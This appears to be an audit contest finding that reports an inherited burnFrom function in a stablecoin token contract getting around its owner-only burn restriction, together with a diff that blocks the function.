15,000 USDC
View results
Submission Details
Severity: medium
Valid

Anyone can burn **DecentralizedStableCoin** tokens with `burnFrom` function

Summary

Anyone can burn DSC tokens with burnFrom function inherited of OZ ERC20Burnable contract

Vulnerability Details

In the DecentralizedStableCoin contract the burn function is onlyOwner and is used by DSCEngine contract, which is the owner of DecentralizedStableCoin contract

Impact

The tokens can be burned with burnFrom function bypassing the onlyOwner modifier of the burn functions

Recommendations

Block the burnFrom function of OZ ERC20Burnable contract

@@ -40,6 +40,7 @@ contract DecentralizedStableCoin is ERC20Burnable, Ownable {
error DecentralizedStableCoin__MustBeMoreThanZero();
error DecentralizedStableCoin__BurnAmountExceedsBalance();
error DecentralizedStableCoin__NotZeroAddress();
+ error DecentralizedStableCoin__BlockFunction();
constructor() ERC20("DecentralizedStableCoin", "DSC") {}
@@ -54,6 +55,10 @@ contract DecentralizedStableCoin is ERC20Burnable, Ownable {
super.burn(_amount);
}
+ function burnFrom(address, uint256) public pure override {
+ revert DecentralizedStableCoin__BlockFunction();
+ }
+
function mint(address _to, uint256 _amount) external onlyOwner returns (bool) {
if (_to == address(0)) {
revert DecentralizedStableCoin__NotZeroAddress();

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.